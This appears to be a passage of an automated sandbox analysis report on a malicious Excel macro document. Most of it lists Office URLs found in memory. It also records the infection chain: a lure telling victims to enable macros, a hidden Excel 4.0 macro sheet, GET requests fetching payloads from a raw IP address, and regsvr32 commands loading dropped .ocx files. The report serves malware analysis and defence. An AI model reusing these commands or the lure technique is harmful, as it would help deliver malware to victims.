    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com$;
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com;;5b
    Source: EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comR:
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coml
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comy
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comOCSettingsCloudPolicyServiceAndroidUrlhttps://clients.config.office
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comu
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.750289125.000000000F510000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.ms0
    Source: global trafficHTTP traffic detected: GET /823634401007.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /823634401007.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 16Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNNG Thisfileorigin
    Source: Screenshot number: 16Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 16Screenshot OCR: Enable Macros ) Why I can not open this document? Sheet Ready O Type here to search i "I Ki
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: ClaimCopy-355714047-12022021.xlsbInitial sample: EXEC
    Found protected and hidden Excel 4.0 Macro sheetShow sources
    Source: ClaimCopy-355714047-12022021.xlsbInitial sample: Sheet name: Tiposa1
    Source: ClaimCopy-355714047-12022021.xlsbMacro extractor: Sheet name: Tiposa1
    Source: ClaimCopy-355714047-12022021.xlsbMacro extractor: Sheet name: Tiposa
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_0F6CDC16
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_0F6CDC16
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_0F6CDC16
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_0F6CDC16
    Source: ClaimCopy-355714047-12022021.xlsbVirustotal: Detection: 10%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{B47C1D2D-6777-49F3-9AAF-E664423076B8} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal76.expl.evad.winXLSB@13/6@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: ClaimCopy-355714047-12022021.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: ClaimCopy-355714047-12022021.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: 0E340000.1.drInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: 0E340000.1.drInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
